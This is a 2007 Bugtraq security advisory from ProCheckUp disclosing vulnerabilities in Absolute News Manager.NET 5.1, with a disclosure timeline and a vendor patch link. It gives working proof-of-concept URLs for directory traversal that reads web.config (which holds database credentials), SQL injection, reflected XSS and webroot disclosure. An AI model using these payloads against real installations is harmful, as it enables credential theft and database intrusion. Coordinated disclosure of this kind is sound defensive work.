[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    PR07-39: Multiple vulnerabilities on Absolute News Manager.NET
From:       research () procheckup ! com
Date:       2007-12-04 14:20:36
Message-ID: 20071204142036.22514.qmail () securityfocus ! com
[Download RAW message or body]

PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file \
retrieval and SQL injection

Vulnerabilities found: 16 November 2007

Vendor informed: 19 November 2007

Vulnerability fixed: 28 November 2007

Severity: High

Description: 

Multiple vulnerabilities were found on Absolute News Manager.NET 5.1:

- unauthenticated file retrieval (directory traversal) on '/pages/default.aspx'

- unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly \
'/pages/default.aspx'

- XSS on 'xlaabsolutenm.aspx' and '/pages/default.aspx'

- webroot disclosure on 'getpath.aspx'


File retrieval PoC:

The following URL shows the contents of .NET 'web.config' (contains DB credentials):
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=../web.config

The following URL show contents of the vulnerable script:
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=default.aspx%00


Note: in order to obtain the content of '.aspx' files, a null byte '%00' must be \
added after the filename.

Show content of other scripts:

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../default.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../PPL1HistoryTicker.aspx%00
 http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolutenm.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../streamconfig.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../articlefiles/r.asp%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00


SQL injection PoCs:

Vulnerable script: /[CustomerDefinedDir]/xlaabsolutenm.aspx
Vulnerable parameters: z, pz, ord, sort 

Requesting the following URL returns the version of Windows and SQL server:

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&


System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar \
value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb  9 2007 22:47:07 \
Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 \
(Build 3790: Service Pack 2) ' to data type int.

Other URLs:

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED_PAYLOAD&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&sort=headline&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&sort=headline&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_PAYLOAD&featured=n&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=posted&featured=n&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=only&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_PAYLOAD&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort=posted&
 http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort=posted&


The script '/pages/default.aspx' might also be vulnerable to SQL injection but it has \
not been confirmed.

Requesting the following URLs:

http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=40&z=9999999999999
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=9999999999999&z=1

return the following error:

System.Data.SqlClient.SqlException: Error converting data type nvarchar to int.


XSS PoCs:

Vulnerable script: '/xlaabsolutenm.aspx'
Unsanitized parameter: 'rmore'

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=articleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y


Vulnerable script: '/pages/default.aspx'
Unsanitized parameter: 'template'

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ealert(2)%3C/script%3E


Webroot PoC:

Requesting the 'getpath.aspx' demo script discloses the physical path of the webroot \
- ie:

http://target.tld/[CustomerDefinedDir]/getpath.aspx

	"
	Absolute News Manager Physical Path :
	D:\inetpub\target.tld\[CustomerDefinedDir]\

	Please delete this file from your installation.
	"

Consequences: 

Contents of any files on the web server can be obtained. Unauthorized SQL queries can \
be injected. Scripting code can be run within the security context of the target \
domain. Information about the target environment can be extracted.

Fix:

http://www.xigla.com/security/
http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip

Note: ProCheckUp has NOT tested the patch provided by Xigla Software.


References: 

http://www.procheckup.com/Vulnerability_2007.php
http://www.xigla.com/absolutenmnet/


Credits: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd \
(www.procheckup.com)

ProCheckUp thanks Xigla Software for working with us.


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic